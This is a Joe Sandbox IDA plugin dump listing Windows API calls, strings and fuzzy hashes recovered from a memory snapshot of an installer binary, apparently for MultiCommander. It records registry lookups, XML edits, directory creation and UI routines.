                                                                                                                            • Part of subcall function 00C6CCB0: GetCurrentThreadId.KERNEL32 ref: 00C6CCD7
                                                                                                                          • TlsGetValue.KERNEL32(00C5AF84,00C4E28E,00C59C5C,?,00000000,?,00C59C43,?,?,00000000,00000000,?,00C5504F,00000000,?,00000000), ref: 00C6CB0B
                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000001,00000002,00000000,00000004), ref: 00C6CB34
                                                                                                                          • GetCurrentThread.KERNEL32 ref: 00C6CB3B
                                                                                                                          • GetCurrentProcess.KERNEL32(00000000), ref: 00C6CB42
                                                                                                                          • DuplicateHandle.KERNEL32(00000000), ref: 00C6CB49
                                                                                                                          • TlsSetValue.KERNEL32(00000000), ref: 00C6CB56
Similarity
• API ID: Current$ProcessThreadValue$AllocDuplicateHandle
• API String ID: 3981808159-0
• Opcode ID: 7f356033f6f2fce2d3ac163c0f3b165216d3374e9d897141dec8bfe82e994687
• Instruction ID: a8f13bcd316c3dcf29a683db0777e08239fa91ddc6ea776a973c88121fd9bbde
• Opcode Fuzzy Hash: 7f356033f6f2fce2d3ac163c0f3b165216d3374e9d897141dec8bfe82e994687
• Instruction Fuzzy Hash: E7F082B17002407BEB102BF0BCCEF2E3B68EB85742F04403AF645D61E1DA76D8119724
APIs
• __EH_prolog3_GS.LIBCMT ref: 00C39AE8
• CoCreateGuid.OLE32(?,00000034), ref: 00C39B3D
• SysFreeString.OLEAUT32(?), ref: 00C39D27
Similarity
• API ID: CreateFreeGuidH_prolog3_String
• String ID: %08lX-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X$RestartByRestartManager
• API String ID: 1084067465-5890034
• Opcode ID: 74a80403c8e6192f09aac473dfa928f45963ef5c1bc9550f2c05dbf6660b6105
• Instruction ID: 41f91f2a415de669409a25da3469d7e4fb25e582025e119996ae5aab83fdd239
• Opcode Fuzzy Hash: 74a80403c8e6192f09aac473dfa928f45963ef5c1bc9550f2c05dbf6660b6105
• Instruction Fuzzy Hash: C1A1C271A00119AFCF05EBA4D898AFEBBB9EF48314F184069F541B7291DF749E05EB60
APIs
  • Part of subcall function 00C3E462: __EH_prolog3.LIBCMT ref: 00C3E47F
• SendMessageW.USER32(?,00000433,00000000,?), ref: 00C3165F
• GetWindowLongW.USER32(?,000000FC), ref: 00C3166A
• GetWindowLongW.USER32(?,000000FC), ref: 00C3167E
• SetWindowLongW.USER32(?,000000FC,00000000), ref: 00C316A7
Similarity
• API ID: LongWindow$H_prolog3MessageSend
• String ID: ,
• API String ID: 4140968126-3772416878
• Opcode ID: 61db298d15c6f00e69cb9433c65cb0255787dde5c494dfba64b7d4557f0bc85e
• Instruction ID: 8125dcdc0e42bb641e4ec2b0f44e0875504d96fec07d715f3790d194c47700ad
• Opcode Fuzzy Hash: 61db298d15c6f00e69cb9433c65cb0255787dde5c494dfba64b7d4557f0bc85e
• Instruction Fuzzy Hash: DB71C131B10615EFCF15AFA4D899A6DB7B5FF48350F08016AED5297292DB70EE00DBA0
APIs
• __EH_prolog3_GS.LIBCMT ref: 00C35607
• GetVersionExW.KERNEL32(?), ref: 00C35683
• CoInitializeEx.OLE32(00000000,00000002), ref: 00C35813
• CoCreateInstance.OLE32(00C9C2E0,00000000,00000001,00C99F88,?), ref: 00C3585A
Similarity
• API ID: CreateH_prolog3_InitializeInstanceVersion
• String ID: @
• API String ID: 1117250964-2766056989
• Opcode ID: 39aadca7994a2d51462c725f0158ac383748a224922d041db632e07699539230
• Instruction ID: ae32aa416c62f974f91ce9c9ea8836a87457438235c8a52a0a6ce9d448c2ed1c
• Opcode Fuzzy Hash: 39aadca7994a2d51462c725f0158ac383748a224922d041db632e07699539230
• Instruction Fuzzy Hash: 578159B0B11B16AFDB58DF28C885BD9B7E8FF09310F00425AE958D7291DB30A955CFA1
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000000), ref: 00C3BC98
• PathFindExtensionW.SHLWAPI(?,?,00000000), ref: 00C3BCB2
Similarity
• API ID: ExtensionFileFindModuleNamePath
• String ID: .CHM$.HLP$.INI
• API String ID: 2295281026-4017452060
• Opcode ID: 7cf0d02e93ba0bb7a2f65dd0307871a1da5a878c85125c5bb70820f64a23de84
• Instruction ID: c8ab6b8e85370af843932f7f44455d1db6391aebe42e57914edf21e9c752ee45
• Opcode Fuzzy Hash: 7cf0d02e93ba0bb7a2f65dd0307871a1da5a878c85125c5bb70820f64a23de84
• Instruction Fuzzy Hash: E841A0B19107099BDB20EB74DD49BAAB3FCAF54310F04486AA656C7681EF70DE44CB61
Strings
• Failed to update xml file..., xrefs: 00C184C7
• Inserting XML : "%s" ---> "%s", xrefs: 00C1846F
Similarity
• API ID: _strlen$H_prolog3_
• String ID: Failed to update xml file...$Inserting XML : "%s" ---> "%s"
• API String ID: 2786647812-2790445707
• Opcode ID: c1078bd366826bd0c3d9b4fd35763802a4d9a16a6fc25c0190facf2a8997f5d4
• Instruction ID: 116dddaa639c4f3ad8d89db1215e04602d8392770b4cb474934d8c762cbbbdee
• Opcode Fuzzy Hash: c1078bd366826bd0c3d9b4fd35763802a4d9a16a6fc25c0190facf2a8997f5d4
• Instruction Fuzzy Hash: 69517E71D00258EFDB10EFA9D8959DEB7B8FF15700F508129F425AB1A1DF709A48EB90
Strings
• Removing XML Node: "%s" from "%s", xrefs: 00C182EA
• Removing XML Node: Failed or not found., xrefs: 00C1831E
Similarity
• API ID: _strlen$H_prolog3_
• String ID: Removing XML Node: "%s" from "%s"$Removing XML Node: Failed or not found.
• API String ID: 2786647812-415792819
• Opcode ID: 7f8d678c60abbd9b8b7e4140f9fc2d88e04e3b3f2e6cf112d3a45733bcef8786
• Instruction ID: 334f7c307b3f7a8c0d5b2964cbf342b86b0350a7c605b5faf262b93e3cdab946
• Opcode Fuzzy Hash: 7f8d678c60abbd9b8b7e4140f9fc2d88e04e3b3f2e6cf112d3a45733bcef8786
• Instruction Fuzzy Hash: 5C418A71E00258EBDB10EFA9C8969DEB7B8FF19700F544129F511BB091DB709E49EBA0
APIs
• _ValidateLocalCookies.LIBCMT ref: 00C6FB17
• ___except_validate_context_record.LIBVCRUNTIME ref: 00C6FB1F
• _ValidateLocalCookies.LIBCMT ref: 00C6FBA8
• _ValidateLocalCookies.LIBCMT ref: 00C6FC28
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CookiesLocalValidate$___except_validate_context_record
                                                                                                                          • String ID: csm
                                                                                                                          • API String ID: 2101322661-1018135373
                                                                                                                          • Opcode ID: b21d2f004dab6e880cd184c74f87f4ae24b1c53d2df3b6431ed75d364b040ca7
                                                                                                                          • Instruction ID: 414b8e7afcf30900ce94b3ddb4b404646b082bf8fe70458e8ac7e38dc99c61f1
                                                                                                                          • Opcode Fuzzy Hash: b21d2f004dab6e880cd184c74f87f4ae24b1c53d2df3b6431ed75d364b040ca7
                                                                                                                          • Instruction Fuzzy Hash: B441BA34A00209DBCF20DF69D894A9E7BB5FF45314F24C169E8289B352D731DA06DB90
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C1C546
                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,00000074,00C1C348), ref: 00C1C582
                                                                                                                          • Sleep.KERNEL32(000003E8,00000074,00C1C348), ref: 00C1C58D
                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,?,00CAE150,?,00000005), ref: 00C1C669
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ExecuteH_prolog3_ObjectShellSingleSleepWait
                                                                                                                          • String ID: open
                                                                                                                          • API String ID: 213813978-2758837156
                                                                                                                          • Opcode ID: 7d9c638a7b0ed1d5885ff968c96ad8e94df96b0dae03cddba9a03c6bee785c6b
                                                                                                                          • Instruction ID: 5cb687c07f1830bbba26118abd841165d8977439592076c8a5ab821db7ac6d03
                                                                                                                          • Opcode Fuzzy Hash: 7d9c638a7b0ed1d5885ff968c96ad8e94df96b0dae03cddba9a03c6bee785c6b
                                                                                                                          • Instruction Fuzzy Hash: 3041A2B2A40215EBDF14EF94CC89BED7779EF45710F184169F515BB182DB30AA80DBA0
                                                                                                                          APIs
                                                                                                                          • KillTimer.USER32(?,00000064), ref: 00C1E54F
                                                                                                                          • SetTimer.USER32(?,000000C8,000000FA,00000000), ref: 00C1E565
                                                                                                                          • KillTimer.USER32(?,00000096), ref: 00C1E5B6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Timer$Kill
                                                                                                                          • String ID: d
                                                                                                                          • API String ID: 3307318486-2564639436
                                                                                                                          • Opcode ID: d58243dce96201d29339313fca6e860ab6f466a0676300ebfa63605029ad137c
                                                                                                                          • Instruction ID: 12966cfe71365ede801366c0e96162aa57e6adb96dcd4260e1ac7541d575567c
                                                                                                                          • Opcode Fuzzy Hash: d58243dce96201d29339313fca6e860ab6f466a0676300ebfa63605029ad137c
                                                                                                                          • Instruction Fuzzy Hash: 2821A730240705DBD6355B21CC15FEB7AA6FB92B00F40452DF8AA861A0EF716990EF41
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C18113
                                                                                                                          • _strlen.LIBCMT ref: 00C18137
                                                                                                                          • GetFileAttributesW.KERNEL32(?,00000000,00000020,00C1716A,?), ref: 00C1817E
                                                                                                                          Strings
                                                                                                                          • Creating directory : "%s", xrefs: 00C1819B
                                                                                                                          • Failed to create directory..., xrefs: 00C181BF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AttributesFileH_prolog3__strlen
                                                                                                                          • String ID: Creating directory : "%s"$Failed to create directory...
                                                                                                                          • API String ID: 3880062980-575565180
                                                                                                                          • Opcode ID: 4bffaecd59604d7e8c313b60a9413a5b61e161c13f2f54002ae82eaffccbdeb2
                                                                                                                          • Instruction ID: c05a49a4b63a3ca97b26d8b2ff23e2c0fa06f6248ff1df7f341e2dc3ad814cd5
                                                                                                                          • Opcode Fuzzy Hash: 4bffaecd59604d7e8c313b60a9413a5b61e161c13f2f54002ae82eaffccbdeb2
                                                                                                                          • Instruction Fuzzy Hash: 81218072A04208ABCF00EE99D8858DE7778EF59710F244525F811B7091DB309F8AEBA0
                                                                                                                          APIs
                                                                                                                          • GetSysColor.USER32(00000008), ref: 00C13DFD
                                                                                                                          • GetSysColor.USER32(00000005), ref: 00C13E03
                                                                                                                          • GetSysColor.USER32(0000000E), ref: 00C13E0A
                                                                                                                          • GetSysColor.USER32(0000000D), ref: 00C13E11
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Color
                                                                                                                          • String ID: /
                                                                                                                          • API String ID: 2811717613-2340523434
                                                                                                                          • Opcode ID: 899cba7ca82259a9081018fef4cee206148449220995cd15d6e45e93177d68d8
                                                                                                                          • Instruction ID: 85a73d4a86f0ef19dd5487c238eb377a33c6d1a337957c730436d1f73f461c84
                                                                                                                          • Opcode Fuzzy Hash: 899cba7ca82259a9081018fef4cee206148449220995cd15d6e45e93177d68d8
                                                                                                                          • Instruction Fuzzy Hash: 19319EB1A15B56AEC3589F2AD549781FFE0FF08318F10822ED1688BB51C7B0A068DFC4
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Edit
                                                                                                                          • API String ID: 0-554135844
                                                                                                                          • Opcode ID: 677bd6b645b01ef0b4c5f7641102042e9749e6a35152527002eee453b3cd3c5b
                                                                                                                          • Instruction ID: d6291ecc07707ff11e39303f4c773acf0df414a3fc0a14d15e2843139f02063d
                                                                                                                          • Opcode Fuzzy Hash: 677bd6b645b01ef0b4c5f7641102042e9749e6a35152527002eee453b3cd3c5b
                                                                                                                          • Instruction Fuzzy Hash: 7511C471360303ABEE301B35CC09F7AF6A8AF40769F184535F562921E1DF71D948D650
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(Advapi32.dll,4641B5ED,?,?,?,00C928E2,000000FF), ref: 00C423A1
                                                                                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00C423B1
                                                                                                                            • Part of subcall function 00C3B452: GetModuleHandleW.KERNEL32(Advapi32.dll,?), ref: 00C3B465
                                                                                                                            • Part of subcall function 00C3B452: GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW), ref: 00C3B475
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                          • String ID: Advapi32.dll$RegDeleteKeyExW
                                                                                                                          • API String ID: 1646373207-2191092095
                                                                                                                          • Opcode ID: 7c262e309eb993204fedfbb4ad47ca42702990265b995a4be5031cc5713307dd
                                                                                                                          • Instruction ID: 966cde204b99958a99e7f69d037f2029466a40a87f4ba9b3e6907373c3026a88
                                                                                                                          • Opcode Fuzzy Hash: 7c262e309eb993204fedfbb4ad47ca42702990265b995a4be5031cc5713307dd
                                                                                                                          • Instruction Fuzzy Hash: AD11C176504144EFCB119F15EC09F9DBFB8FB08B50F10822AF916A32B0CB799900EB54
APIs
• RegOpenKeyExW.ADVAPI32(?,Software\MultiCommander,00000000,00020019,?), ref: 00C198CA
• RegQueryValueExW.ADVAPI32(?,InstallDir,00000000,00000001,?,?,?,Software\MultiCommander,00000000,00020019,?), ref: 00C19909
• RegCloseKey.ADVAPI32(?,?,Software\MultiCommander,00000000,00020019,?), ref: 00C19919
Strings
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID: InstallDir$Software\MultiCommander
• API String ID: 3677997916-1212951130
• Opcode ID: 4baf4887b7a9789afaa137f23fcb8ce5aba9356df4873d8bed0cdd12303934cd
• Instruction ID: 9537684d16be86df807566da56e7556917796f680d8f379f2fa67287f97f63e8
• Opcode Fuzzy Hash: 4baf4887b7a9789afaa137f23fcb8ce5aba9356df4873d8bed0cdd12303934cd
• Instruction Fuzzy Hash: 52112EB0A00229AADB309F16DC4CFDFBBB8EB45754F1041EAB419E2251DB704E85DF61
APIs
• __EH_prolog3.LIBCMT ref: 00C400E5
• GetClassNameW.USER32(?,00000000,00000400), ref: 00C40116
• GetWindowLongW.USER32(?,000000F0), ref: 00C4014F
Strings
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: ClassH_prolog3LongNameWindow
• String ID: ComboBox$ComboBoxEx32
• API String ID: 297531199-1907415764
• Opcode ID: 3890c3ca7360724fe2350e67914d94dd74cc914c1c5d9a8ba844e682edf63359
• Instruction ID: 9ea707f24c1f7711b96775804a349a84eb13bc2815af2e5cd0a081ecdfb6ef58
• Opcode Fuzzy Hash: 3890c3ca7360724fe2350e67914d94dd74cc914c1c5d9a8ba844e682edf63359
• Instruction Fuzzy Hash: 6B01D872841112ABDF14EB60DD59BEE7774BF61324F204619F520721D0DF709A09DB64
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,4641B5ED,?,?,00000000,00C928E2,000000FF,?,00C8092C,?,?,00C80900,00000000), ref: 00C80985
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00C80997
• FreeLibrary.KERNEL32(00000000,?,00000000,00C928E2,000000FF,?,00C8092C,?,?,00C80900,00000000), ref: 00C809B9
Strings
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: f1f2dfebe4edb0af8db0cb12215febbda1b4652c2fb175b1d194928c09c322ef
• Instruction ID: 523edb75a5e7b05d7aeee1ec718f970077eaf1e5cc193b315ba3c93a4034fb8f
• Opcode Fuzzy Hash: f1f2dfebe4edb0af8db0cb12215febbda1b4652c2fb175b1d194928c09c322ef
• Instruction Fuzzy Hash: 4F01D631910625FFDB119F40CC09BAEBBB8FB04B28F00013AF821E22E1DB749904CB94
APIs
• GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,00C1F57C,00000000,%d MBytes user address space free.), ref: 00C1F2E3
• GetProcAddress.KERNEL32(00000000), ref: 00C1F2EA
• GetCurrentProcess.KERNEL32(00000000,?,?,00C1F57C,00000000,%d MBytes user address space free.), ref: 00C1F2FD
Strings
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: AddressCurrentHandleModuleProcProcess
• String ID: IsWow64Process$kernel32
• API String ID: 4190356694-3789238822
• Opcode ID: 07fed59b80d785fe9fee8c22fa44930e897f2bce2c4f0fe08ed329cbf52db010
• Instruction ID: 8c5c36d9e320e10a3dbc87ef5e559223383e15543ab641a45f661928654a211f
• Opcode Fuzzy Hash: 07fed59b80d785fe9fee8c22fa44930e897f2bce2c4f0fe08ed329cbf52db010
• Instruction Fuzzy Hash: 51E0E5B1A00305ABDF009BB0EC0EB9E7AA8BB067CAF444469E001D20A0D7B8D645EA14
APIs
• __EH_prolog3_catch.LIBCMT ref: 00C381C5
• GlobalLock.KERNEL32(00000000), ref: 00C382C7
• DestroyWindow.USER32(?,?,?,00000000,00C38007,00000000), ref: 00C383B0
• GlobalUnlock.KERNEL32(00000000), ref: 00C383BD
• GlobalFree.KERNEL32(00000000), ref: 00C383C4
  • Part of subcall function 00C414B5: GetStockObject.GDI32(00000011), ref: 00C414D7
  • Part of subcall function 00C414B5: GetStockObject.GDI32(0000000D), ref: 00C414E3
  • Part of subcall function 00C414B5: GetObjectW.GDI32(00000000,0000005C,?), ref: 00C414F4
  • Part of subcall function 00C414B5: GetDC.USER32(00000000), ref: 00C41503
  • Part of subcall function 00C414B5: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C4151A
  • Part of subcall function 00C414B5: MulDiv.KERNEL32(?,00000048,00000000), ref: 00C41526
  • Part of subcall function 00C414B5: ReleaseDC.USER32(00000000,00000000), ref: 00C41532
  • Part of subcall function 00C4119F: GlobalFree.KERNEL32 ref: 00C411A6
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: Global$Object$FreeStock$CapsDestroyDeviceH_prolog3_catchLockReleaseUnlockWindow
• String ID:
• API String ID: 15253214-0
• Opcode ID: 3811b1bf458667d0daa6dfc8b0131c705e725ef6702fcbfa8a55625f3de399da
• Instruction ID: d3b8a56ee3e3857063b68119736ab8a5046c6d1bad9a8f2a792ba4123fbdfbed
• Opcode Fuzzy Hash: 3811b1bf458667d0daa6dfc8b0131c705e725ef6702fcbfa8a55625f3de399da
• Instruction Fuzzy Hash: 5D514B30E1061ADFCB05DFA4C945BAEBBB4BF08710F150069F951B72A1DB74AE09DBA1
APIs
• __EH_prolog3.LIBCMT ref: 00C309BF
  • Part of subcall function 00C324FC: SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 00C32536
  • Part of subcall function 00C324FC: SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 00C32560
  • Part of subcall function 00C324FC: GetCapture.USER32 ref: 00C32576
  • Part of subcall function 00C324FC: SendMessageW.USER32(00000000,0000001F,00000000,00000000), ref: 00C32585
• GetClientRect.USER32(?,?), ref: 00C30A91
• IsMenu.USER32(00000000), ref: 00C30ACD
• AdjustWindowRectEx.USER32(?,00000000,00000000,?), ref: 00C30AE5
